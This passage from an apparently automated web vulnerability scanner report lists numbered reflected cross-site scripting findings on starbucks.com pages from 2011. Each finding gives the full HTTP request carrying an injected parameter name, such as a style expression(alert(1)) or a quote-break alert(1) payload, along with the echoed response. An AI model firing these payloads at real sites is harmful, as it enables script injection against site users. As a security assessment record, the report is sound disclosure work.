GET /coffeehouse/entertainment?f184b"style%3d"x%3aexpression(alert(1))"96125b2cebe=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:11:51 GMT Connection: close Content-Length: 54188
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/entertainment?f184b"style="x:expression(alert(1))"96125b2cebe=1" /> ...[SNIP]...
1.673. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/entertainment
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90a4e"%3balert(1)//d2bb761e82e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 90a4e";alert(1)//d2bb761e82e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffeehouse/entertainment?90a4e"%3balert(1)//d2bb761e82e=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:11:54 GMT Connection: close Content-Length: 54093
1.674. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/mobile-apps
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4131d"style%3d"x%3aexpression(alert(1))"c25fff327f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4131d"style="x:expression(alert(1))"c25fff327f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/mobile-apps?4131d"style%3d"x%3aexpression(alert(1))"c25fff327f9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:11:56 GMT Connection: close Content-Length: 40635
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps?4131d"style="x:expression(alert(1))"c25fff327f9=1"/> ...[SNIP]...
1.675. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/mobile-apps
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fa55"%3balert(1)//0b5e66ea4df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7fa55";alert(1)//0b5e66ea4df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffeehouse/mobile-apps?7fa55"%3balert(1)//0b5e66ea4df=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:11:57 GMT Connection: close Content-Length: 40540
1.676. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/mobile-apps/mystarbucks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae0f9"style%3d"x%3aexpression(alert(1))"6743e2ed601 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae0f9"style="x:expression(alert(1))"6743e2ed601 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/mobile-apps/mystarbucks?ae0f9"style%3d"x%3aexpression(alert(1))"6743e2ed601=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:12:36 GMT Connection: close Content-Length: 37985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks?ae0f9"style="x:expression(alert(1))"6743e2ed601=1"/> ...[SNIP]...
1.677. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/mobile-apps/starbucks-card-mobile
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed19c"style%3d"x%3aexpression(alert(1))"695c8291744 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed19c"style="x:expression(alert(1))"695c8291744 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/mobile-apps/starbucks-card-mobile?ed19c"style%3d"x%3aexpression(alert(1))"695c8291744=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:12:30 GMT Connection: close Content-Length: 38490
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile?ed19c"style="x:expression(alert(1))"695c8291744=1"/> ...[SNIP]...
1.678. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/mobile-apps/starbucks-card-mobile-bb
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21513"style%3d"x%3aexpression(alert(1))"30c5ed9534e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21513"style="x:expression(alert(1))"30c5ed9534e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/mobile-apps/starbucks-card-mobile-bb?21513"style%3d"x%3aexpression(alert(1))"30c5ed9534e=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:11:56 GMT Connection: close Content-Length: 39080
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb?21513"style="x:expression(alert(1))"30c5ed9534e=1"/> ...[SNIP]...
1.679. http://www.starbucks.com/coffeehouse/store-design [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/store-design
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5833a"style%3d"x%3aexpression(alert(1))"12718e18e54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5833a"style="x:expression(alert(1))"12718e18e54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/store-design?5833a"style%3d"x%3aexpression(alert(1))"12718e18e54=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:13:20 GMT Connection: close Content-Length: 43622
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/store-design?5833a"style="x:expression(alert(1))"12718e18e54=1" /> ...[SNIP]...
1.680. http://www.starbucks.com/coffeehouse/wireless-internet [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/wireless-internet
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a344c"style%3d"x%3aexpression(alert(1))"5d8d4bfdaf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a344c"style="x:expression(alert(1))"5d8d4bfdaf3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/wireless-internet?a344c"style%3d"x%3aexpression(alert(1))"5d8d4bfdaf3=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:11:38 GMT Connection: close Content-Length: 38028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet?a344c"style="x:expression(alert(1))"5d8d4bfdaf3=1"/> ...[SNIP]...
1.681. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/coffeehouse/wireless-internet/in-canada
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95eff"style%3d"x%3aexpression(alert(1))"52d652315b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95eff"style="x:expression(alert(1))"52d652315b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/wireless-internet/in-canada?95eff"style%3d"x%3aexpression(alert(1))"52d652315b0=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:11:53 GMT Connection: close Content-Length: 38308
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet/in-canada?95eff"style="x:expression(alert(1))"52d652315b0=1"/> ...[SNIP]...
1.682. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db28c"style%3d"x%3aexpression(alert(1))"a963d7ce712 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db28c"style="x:expression(alert(1))"a963d7ce712 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coffeehouse/wireless-internet/starbucks-digital-network?db28c"style%3d"x%3aexpression(alert(1))"a963d7ce712=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:11:32 GMT Connection: close Content-Length: 38766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network?db28c"style="x:expression(alert(1))"a963d7ce712=1"/> ...[SNIP]...
1.683. http://www.starbucks.com/customer-service [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c2f"style%3d"x%3aexpression(alert(1))"8870702513a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41c2f"style="x:expression(alert(1))"8870702513a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /customer-service?41c2f"style%3d"x%3aexpression(alert(1))"8870702513a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:25:03 GMT Connection: close Content-Length: 34417
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service?41c2f"style="x:expression(alert(1))"8870702513a=1"/> ...[SNIP]...
1.684. http://www.starbucks.com/customer-service/contact [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service/contact
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 655a7"style%3d"x%3aexpression(alert(1))"cacda66d35a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 655a7"style="x:expression(alert(1))"cacda66d35a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /customer-service/contact?655a7"style%3d"x%3aexpression(alert(1))"cacda66d35a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:10:58 GMT Connection: close Content-Length: 37233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service/contact?655a7"style="x:expression(alert(1))"cacda66d35a=1"/> ...[SNIP]...
1.685. http://www.starbucks.com/customer-service/faqs/card [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service/faqs/card
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58e00"style%3d"x%3aexpression(alert(1))"c89dda96f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 58e00"style="x:expression(alert(1))"c89dda96f09 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /customer-service/faqs/card?58e00"style%3d"x%3aexpression(alert(1))"c89dda96f09=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:11:06 GMT Connection: close Content-Length: 87900
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/card?58e00"style="x:expression(alert(1))"c89dda96f09=1"/> ...[SNIP]...
1.686. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service/faqs/coffee
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c52"style%3d"x%3aexpression(alert(1))"411f5c964e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 64c52"style="x:expression(alert(1))"411f5c964e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /customer-service/faqs/coffee?64c52"style%3d"x%3aexpression(alert(1))"411f5c964e5=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:09:48 GMT Connection: close Content-Length: 37606
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffee?64c52"style="x:expression(alert(1))"411f5c964e5=1"/> ...[SNIP]...
1.687. http://www.starbucks.com/customer-service/faqs/coffeehouse [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/customer-service/faqs/coffeehouse
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 835ba"style%3d"x%3aexpression(alert(1))"de67136c231 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 835ba"style="x:expression(alert(1))"de67136c231 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
